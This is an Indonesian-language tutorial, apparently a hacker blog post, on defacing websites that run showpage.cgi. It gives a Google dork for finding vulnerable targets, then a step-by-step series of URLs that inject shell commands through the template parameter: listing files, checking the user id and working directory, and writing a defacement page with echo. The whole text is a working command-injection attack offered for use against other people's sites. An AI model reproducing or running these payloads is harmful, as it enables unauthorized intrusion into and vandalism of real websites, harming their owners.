Deface melalui showpage.cgi

Deface melalui showpage.cgi - Dari hasil percobaan saya yang dibantu dengan paman google. akhir nya saya dapat juga menemukan bug pada site yang menggunakan Showpage.cgi. ok kita langsung aje ye...... ------------------------------------------------------------------------------- Buka browser anda ke alamat: www.google.com lalu ketikkan keyword: allinurl: showpage.cgi?template= atau kalo kamu tahu keyword lain yang bagus silahkan kamu berkreasi dengan keyword-keyword kamu tersebut. oke.. sudah dapatkah target kita? klo sudah mari kita mulai. Caranya gampang buangat lho.. kamu tinggal berikan command shell seperti di linux.contohnya lagi nih ye.. misalnya http://www.target.nl/showpage.cgi?template=template5.html&tekst=1.txt nah kita tambahin aja.. menjadi: http://www.target.nl/showpage.cgi?template=template5.html|ls -la|&tekst=1.txt nah.. gampang bangat kan, nah kalau sudah begitu kita tinggal deface aje ok... kita lihat dulu uid nye apakah uid user. langkah pertama nye gini: http://www.target.nl/showpage.cgi?template=template5.html|id|&tekst=1.txt terus yang kedua nye : http://www.target.nl/showpage.cgi?template=template5.html|pwd|&tekst=1.txt maka akan muncul seperti ini :/home/arday/site90/web setelah muncul kaya gitu tinggal deface aja ketik: http://www.target.nl/showpage.cgi?template=template5.html|echo "Haloo arday " > arday.html|&tekst=1.txt Gimana Mudah bukan...............ok sampai disini dulu artikel saya...